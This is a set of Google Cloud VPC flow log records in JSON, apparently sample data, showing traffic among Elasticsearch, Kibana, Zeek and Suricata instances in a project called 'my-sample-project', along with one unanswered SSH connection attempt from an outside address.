-{"insertId":"bxuq05fhgmw92","jsonPayload":{"bytes_sent":"358920","connection":{"dest_ip":"10.87.40.76","dest_port":33966,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"61","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510534141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},
"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
-{"insertId":"bxuq05fhgmw8u","jsonPayload":{"bytes_sent":"653827","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"198.51.100.88","src_port":53104},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:45.312543839Z","packets_sent":"286","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.188944581Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
-{"insertId":"bxuq05fhgmw9g","jsonPayload":{"bytes_sent":"5220","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33966},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"81","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510534141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
-{"insertId":"bxuq05fhgmw91","jsonPayload":{"bytes_sent":"31140","connection":{"dest_ip":"10.87.40.76","dest_port":33524,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461240929Z","packets_sent":"40","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.789945697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
-{"insertId":"bxuq05fhgmw95","jsonPayload":{"bytes_sent":"1610630","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.0.2.177","src_port":60126},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.101129310Z","packets_sent":"509","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.019841536Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
-{"insertId":"bxuq05fhgmw9a","jsonPayload":{"bytes_sent":"37145","connection":{"dest_ip":"198.51.100.88","dest_port":53104,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:45.312543839Z","packets_sent":"158","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.188944581Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
-{"insertId":"198begsfh44xy3","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":53972},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:20.748121914Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:20.634231041Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xxt","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":58100},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:20.632737426Z","packets_sent":"7","reporter":"DEST","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:20.512264850Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xy8","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.0.2.117","dest_port":58100,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:20.632777660Z","packets_sent":"7","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:20.512407536Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xy9","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"198.51.100.107","dest_port":60756,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:11.032929292Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:10.912193869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xxr","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"198.51.100.182","src_port":14236},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:12.064908439Z","packets_sent":"3","reporter":"DEST","src_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"start_time":"2019-06-14T03:40:08.247072525Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xy2","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"203.0.113.27","dest_port":60122,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:39.207635184Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:39.087226326Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xy6","jsonPayload":{"bytes_sent":"1782","connection":{"dest_ip":"203.0.113.12","dest_port":53972,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:20.748121914Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:20.634231041Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xxx","jsonPayload":{"bytes_sent":"68545","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33530},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.205089801Z","packets_sent":"368","reporter":"DEST","rtt_msec":"163","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140301693Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwo
rk_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xy4","jsonPayload":{"bytes_sent":"74613","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65274},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"745","reporter":"DEST","rtt_msec":"209","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:01.270996793Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xy1","jsonPayload":{"bytes_sent":"74942","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":53879},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"726","reporter":"DEST","rtt_msec":"176","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760414869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xxp","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":34450},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:38.299054333Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:38.189569840Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xxv","jsonPayload":{"bytes_sent":"121593","connection":{"dest_ip":"203.0.113.58","dest_port":65274,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"610","reporter":"SRC","rtt_msec":"209","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.270996793Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xy7","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":60968},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:39.777977145Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:39.653136947Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xxs","jsonPayload":{"bytes_sent":"177471","connection":{"dest_ip":"203.0.113.134","dest_port":33530,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.205194199Z","packets_sent":"246","reporter":"SRC","rtt_msec":"163","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140301693Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} 
-{"insertId":"198begsfh44xxq","jsonPayload":{"bytes_sent":"53315","connection":{"dest_ip":"203.0.113.58","dest_port":65275,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316847800Z","packets_sent":"588","reporter":"SRC","rtt_msec":"82","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.565734921Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xxz","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"203.0.113.27","dest_port":34450,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:38.299054333Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:38.189569840Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xxy","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":60122},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:39.207635184Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:39.087226326Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xxu","jsonPayload":{"bytes_sent":"102119","connection":{"dest_ip":"203.0.113.58","dest_port":53879,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"608","reporter":"SRC","rtt_msec":"176","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760414869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xxo","jsonPayload":{"bytes_sent":"1794","connection":{"dest_ip":"203.0.113.27","dest_port":60968,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:39.777977145Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:39.653136947Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xy0","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":60756},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:11.032929292Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:10.912193869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xxw","jsonPayload":{"bytes_sent":"67013","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65275},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316847800Z","packets_sent":"710","reporter":"DEST","rtt_msec":"82","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.565734921Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"198begsfh44xy5","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"198.51.100.182","dest_port":14236,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"end_time":"2019-06-14T03:40:09.257387426Z","packets_sent":"1","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.247072525Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
-{"insertId":"19im82tfdygznq","jsonPayload":{"bytes_sent":"64427","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33542},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"351","reporter":"DEST","rtt_msec":"173","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150870105Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygzn6","jsonPayload":{"bytes_sent":"183366","connection":{"dest_ip":"10.87.40.76","dest_port":33690,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"242","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075665334Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
